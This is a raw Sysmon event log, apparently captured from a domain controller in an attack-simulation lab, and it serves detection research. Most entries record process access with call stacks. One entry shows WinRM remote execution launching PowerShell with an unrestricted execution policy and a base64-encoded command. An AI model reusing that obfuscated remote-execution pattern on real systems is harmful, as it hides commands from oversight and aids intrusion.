13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42BE-6000-8C00-000000009A01}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-42BE-6000-8A00-000000009A01}50205076C:\Windows\system32\WinrsHost.exe{08A6967A-42BE-6000-8C00-000000009A01}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000002952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.887{08A6967A-42BE-6000-8C00-000000009A01}5104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-42BE-6000-B81C-090000000000}0x91cb80HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-42BE-6000-8A00-000000009A01}5020C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.882{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.773{08A6967A-4288-6000-1500-000000009A01}13241972C:\Windows\system32\svchost.exe{08A6967A-42BE-6000-8A00-000000009A01}5020C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.758{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-42BE-6000-8A00-000000009A01}5020C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-42BE-6000-8B00-000000009A01}50325052C:\Windows\system32\conhost.exe{08A6967A-42BE-6000-8A00-000000009A01}5020C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-42BE-6000-8B00-000000009A01}5032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:22.742{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-42BE-6000-8A00-000000009A01}5020C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 